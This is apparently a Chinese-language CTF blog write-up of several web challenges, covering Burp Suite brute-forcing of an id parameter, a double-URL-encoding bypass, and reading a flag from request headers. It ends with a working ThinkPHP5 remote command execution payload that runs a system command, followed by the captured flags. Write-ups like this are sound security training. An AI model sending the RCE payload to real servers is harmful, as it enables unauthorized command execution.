web进阶区题目相对于新手区较难,此博客只是记录了一些比较重要或者
有代表性的题目,比较难的题暂时不会解,以后还会有补充。
这道题用到了对id参数进行爆破。进入题目后看到url后存在参数id,使用各种注入方式后均没有爆破成功,最后使用bp对id参数进行爆破
进入报表中心,看到url
用bp爆破id,id=2334时有变化,查看response,找到flag。
题目提示进入index.php页面,查看源代码,
大意就是id进行 urldecode()后等于 admin,由于浏览器会自动 进行一次解码,所以需要进行两次加密
第一次:%61%64%6d%69%6e
第二次:%2561%2564%256d%2569%256e
payload: ?id=%2561%2564%256d%2569%256e
cyberpeace{08408ed7908adc72cc8b92ad9d7cc31e}
题目直接就提示了初始页面,那么直接江url改为index.php,然后就自动跳转到1.php,然后使用burp suite抓index.php的包,在请求头看到了flag
flag{very_baby_web}
这道题用到了thinkphp5 远程命令执行漏洞,具体内容可以百度
这个是payload:
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system(“cat%20…/…/…/flag”);%27
flag{thinkphp5_rce}